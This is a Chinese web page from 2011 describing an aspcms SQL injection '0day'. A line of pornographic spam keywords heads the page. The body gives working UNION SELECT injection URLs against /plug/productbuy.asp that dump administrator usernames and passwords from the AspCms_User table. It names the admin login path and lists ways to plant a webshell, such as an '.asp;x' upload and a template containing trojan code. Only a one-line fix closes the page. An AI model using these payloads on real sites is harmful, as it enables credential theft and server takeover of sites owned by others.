欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

aspcms企業(yè)建站系統(tǒng)0day漏洞介紹

  發(fā)布時(shí)間:2011-09-26 01:04:08   作者:佚名   我要評(píng)論
aspcms企業(yè)建站系統(tǒng)0day 2.0以上通殺2011-08-14 19:21aspcms開(kāi)發(fā)的全新內(nèi)核的開(kāi)源企業(yè)建站系統(tǒng),能夠勝任企業(yè)多種建站需求,并且支持模版自定義、支持?jǐn)U展插件等等,能夠在短時(shí)間內(nèi)完成企業(yè)建站。
漏洞出現(xiàn)在
/plug/productbuy.asp
對(duì)接收的參數(shù)id沒(méi)有進(jìn)行過(guò)濾而導(dǎo)致的注入漏洞
注入后的頁(yè)面有跳轉(zhuǎn),所以要快,建議用快捷鍵復(fù)制
爆用戶名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
這是爆ID=1的賬戶名,如果發(fā)現(xiàn)權(quán)限不夠可以往后試2,3,4...........

爆密碼
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

后臺(tái)登錄地址:/admin/login.asp

后臺(tái)拿shell
1、直接上傳.asp;x
2、系統(tǒng)配置信息
3、模版管理新建1.asp模板,內(nèi)容寫(xiě)馬的內(nèi)容.

修復(fù)方法: id用cint(request("id"))

相關(guān)文章

最新評(píng)論